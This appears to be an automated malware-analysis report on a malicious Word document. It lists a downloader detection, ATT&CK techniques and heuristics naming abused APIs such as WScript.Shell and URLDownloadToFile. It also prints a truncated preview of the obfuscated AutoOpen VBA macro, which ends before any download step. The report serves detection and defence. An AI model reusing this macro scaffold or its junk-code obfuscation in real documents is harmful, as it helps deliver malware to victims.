Verdict: MALICIOUS
Risk Score: 282
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro uses obfuscation techniques, including splitting keywords, to hide its malicious intent. It also utilizes the GetObject function and an autoopen macro, indicating an attempt to execute code upon opening. The ClamAV detection and heuristic firings strongly suggest this is a downloader.
Heuristics (8)

- ClamAV: Doc.Downloader.00536d-6944297-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28550 bytes |

SHA-256 of macros.bas: b4cad42e6ffc25584ff0726c421fa0c82ea1c6cbec98796cb44d3ae3dff9441a
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "skAAA44"
Sub autoopen()
If mBB_UkB = FABAAUxC Then
NUBkAQxw = 40652062 * wAAXQwC
ElseIf SAxX_AQU = hAwQGC Then
Set aUUoQAA = V4_XDQ
ElseIf GUAAAw = mADADQ Then
oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
ElseIf DAZ4QDA = BAcGcA Then
XCCZZA = 27339839
End If
If zGCAA_ = WC4GABx Then
IBCAcA = 427739662 * DZ41AB
ElseIf wZcBkZAw = wXZAGc_A Then
Set oxAZ_cUw = KQAG4Q
ElseIf CDwx4Q = iABAAZ Then
KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
ElseIf VAAQAxU = QoUAQQA Then
WkAoxkoD = 73589769
End If
If YUAUGkAB = fZQU_CUQ Then
oUAABUA = 312282061 * UZAU_C
ElseIf ZUAGUGw = iwkU1ZD Then
Set hGBCACDA = iDwQBB
ElseIf VDcDUcD = TBDxQ_ Then
XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
ElseIf PCUkUDGA = hoAABCA Then
AxccDAA = 907020580
End If
nXQ4AD
If HxBAAAw = XQCDAw Then
RAcQCc = 583652363 * FBGUUoUG
ElseIf Q4_AAA = vQBAoADD Then
Set vXAcCU = RDAoBG4
ElseIf UBUAkB = RoGUZAAA Then
YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
ElseIf mADkD1Ck = CCXXAU Then
hAGACAkA = 767101096
End If
If wDxAAAw = E_QAABB Then
rCABAAC = 832649815 * GAw1oD
ElseIf Z1o4G1DZ = LA44AA Then
Set cUCwoA = pxoXGc
ElseIf EDZwAZ = cA4xQZx Then
oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
ElseIf A_wDAxc = QCQAQB Then
NxwAUAAB = 76026590
End If
If cUZAQA1 = o1A1Qcw1 Then
V__AXG = 739424599 * TAAoBAXA
ElseIf JDXCABkG = zQGUBQxD Then
Set zAwAQA = MABDBQQ
ElseIf aXDAxA = iGAAAkkA Then
TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
ElseIf jZxQA4 = rAA_wc Then
iXAAwkUw = 185960431
End If
End Sub
Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
If TDCABBA = RZUUZD4D Then
HZk1cAA = 111488983 * zxDwAX
ElseIf lDkQZxU = i1BxABcU Then
Set DcA1_G = RAAQ1AwG
ElseIf SckAUA = JwAADZAC Then
PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
ElseIf pAAQAUX = WDZDx4DA Then
tAA1Axk = 8828071
End If
If GUcAQ1QX = qok1ABo Then
IcXCAxAk = 433040459 * nDAxDAw
ElseIf nGowACQx = q4wZcQCQ Then
Set ZADw_AU = vD4kUA
ElseIf zQGwxc = tQ4BAA Then
VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
ElseIf lAD4_UA = Wx4AXD_D Then
bQBAQw = 763825975
End If
If jAZQkx4 = PcGDkAD Then
NUBcAAk = 110199077 * MAcX4QQ
ElseIf bBkUGA = T_ABZQQZ Then
Set jAAGxAkA = pAADAA
ElseIf HAoDQCAG = nAAGABAQ Then
dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
ElseIf JXUAADZ = jcw4DkA Then
DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
If fGBDAcAo = Vw_BAA Then
YAwA_XQA = 288468827 * F4AAAkwX
ElseIf uAAwXAkQ = nZXAwGQ Then
Set qXGUAx_ = BAwAwk
ElseIf wB1AUU = J4AoAQA Then
UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
ElseIf U1oDDkB = iU4QUw4_ Then
CAUw1A = 877920435
End If
If dUA4CUD = r1UAAZ_A Then
wBADAAUA = 350890717 * jQAAZAQA
ElseIf zxQABU = rcAGBQ4 Then
Set lXBCcUA = ZAQAAAQQ
ElseIf kBDUAAZU = jUAXBAAD Then
... (truncated)
```